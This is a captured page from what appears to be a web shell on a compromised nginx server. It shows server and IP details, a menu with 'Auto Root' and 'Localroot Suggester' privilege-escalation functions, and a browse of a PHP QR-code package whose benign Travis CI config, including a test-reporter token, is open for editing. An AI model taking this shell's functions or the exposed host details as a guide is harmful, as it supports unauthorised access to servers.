Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.225.95.155
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp /
vendor /
werneckbh /
qr-code /
Delete
Unzip
Name
Size
Permission
Date
Action
docs
[ DIR ]
drwxr-xr-x
2018-02-04 09:00
public
[ DIR ]
drwxr-xr-x
2018-02-04 09:00
src
[ DIR ]
drwxr-xr-x
2018-02-04 09:00
tests
[ DIR ]
drwxr-xr-x
2018-02-04 09:00
.gitignore
52
B
-rw-r--r--
2018-02-04 09:00
.travis.yml
752
B
-rw-r--r--
2018-02-04 09:00
CODE_OF_CONDUCT.md
3.15
KB
-rw-r--r--
2018-02-04 09:00
CONTRIBUTING.md
359
B
-rw-r--r--
2018-02-04 09:00
Gemfile
130
B
-rw-r--r--
2018-02-04 09:00
LICENSE.md
1.05
KB
-rw-r--r--
2018-02-04 09:00
README.md
3.09
KB
-rw-r--r--
2018-02-04 09:00
clover.xml
117.19
KB
-rw-r--r--
2018-02-04 09:00
composer.json
608
B
-rw-r--r--
2018-02-04 09:00
phpunit.xml
929
B
-rw-r--r--
2018-02-04 09:00
Save
Rename
env: global: - CC_TEST_REPORTER_ID=1beac4ba6af0f73ad40b9cae67a6afdef4405e801fd5b7e5f4eac4a81d003a6f - GIT_COMMITTED_AT=$(if [ "$TRAVIS_PULL_REQUEST" == "false" ]; then git log -1 --pretty=format:%ct; else git log -1 --skip 1 --pretty=format:%ct; fi) language: php php: - 7.1 before_script: - "composer require codeclimate/php-test-reporter --dev" - "composer install" - curl -L https://codeclimate.com/downloads/test-reporter/test-reporter-latest-linux-amd64 > ./cc-test-reporter - chmod +x ./cc-test-reporter - ./cc-test-reporter before-build script: - "phpunit --coverage-text --coverage-clover ./clover.xml" - if [ "$TRAVIS_PULL_REQUEST" == "false" ]; then ./cc-test-reporter after-build --exit-code $TRAVIS_TEST_RESULT; fi